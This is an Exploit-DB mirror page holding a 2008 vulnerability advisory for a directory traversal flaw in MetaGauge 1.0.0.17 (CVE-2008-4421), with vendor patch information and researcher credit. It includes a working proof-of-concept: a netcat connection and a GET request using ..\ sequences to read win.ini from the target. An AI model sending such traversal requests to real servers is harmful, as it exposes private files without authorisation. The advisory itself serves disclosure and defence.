bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/6686.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

35 lines
No EOL
784 B
Text
Raw Permalink Blame History

Title: MetaGauge 1.0.0.17 Directory Traversal
-------------------------------------------------------------
Vendor: Hammer Software
Vendor URL: www.Hammer-Software.com
Vendor Response: Vendor has been notified and has since addressed the issue in the latest software release.
Description:
A directory traversal vulnerability exists in MetaGauge version 1.0.0.17 (and potentially below) which allows a remote user to view files local to the target server.
Example:
C:\> nc targethost 2004
GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1
Patch Information:
Hammer has addressed the issue in the latest version of MetaGauge:
http://dl.hammer-software.com/metagauge.zip
CVE: CVE-2008-4421
Credit:
Brad Antoniewicz
brad.antoniewicz@foundstone.com
# milw0rm.com [2008-10-06]
Reference in a new issue View git blame Copy permalink